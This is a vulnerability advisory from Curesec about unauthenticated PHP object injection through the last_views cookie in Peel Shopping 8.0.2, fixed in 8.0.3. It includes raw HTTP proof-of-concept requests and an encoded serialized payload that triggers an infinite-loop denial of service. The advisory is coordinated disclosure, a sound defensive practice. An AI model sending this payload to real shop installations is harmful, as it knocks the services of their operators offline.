Peel Shopping 8.0.2 Object Injection

Credit: Tim Coen
Risk: Medium
Local: No
Remote: Yes

Security Advisory - Curesec Research Team 1. Introduction Affected Product: Peel Shopping 8.0.2 Fixed in: 8.0.3 Fixed Version Link: Vendor Website: Vulnerability Type: Object Injection Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 09/15/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is vulnerable to Object Injection. Peel Shopping stores a PHP object in a cookie, which is then unserialized when received by the application. An attacker can send arbitrary PHP objects, and has thus a limited influence on the control flow of the application. This can for example lead to DOS attacks by creating an infinite loop. 3. Details The last_views cookie is passed to unserialize, leading to Object Injection. Authentication is not required. The impact of the vulnerability is difficult to estimate, as it may increase with the existence of further modules. Without any modules installed, it can at a minimum lead to DOS. Proof of Concept: GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Cookie: last_views=[INJECTED_OBJECT]; DOS Example: The Smarty_Internal_Configfileparser class can be used to create an infinite loop. GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Cookie: last_views= %4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d; Connection: close (Payload URL decoded: O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1; s:11:"yyTokenName";a:0:{}}) 4. Solution To mitigate this issue please upgrade at least to version 8.0.3 Please note that a newer version might already be available. 5. Report Timeline 04/11/2016 Informed Vendor about Issue 04/12/2016 Vendor announces release of fix before 05/11/2016 09/14/2016 Disclosed to public Blog Reference: -- blog: tweet: Curesec GmbH Curesec Research Team Josef-Orlopp-StraAe 54 10365 Berlin, Germany


Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021,


Back to Top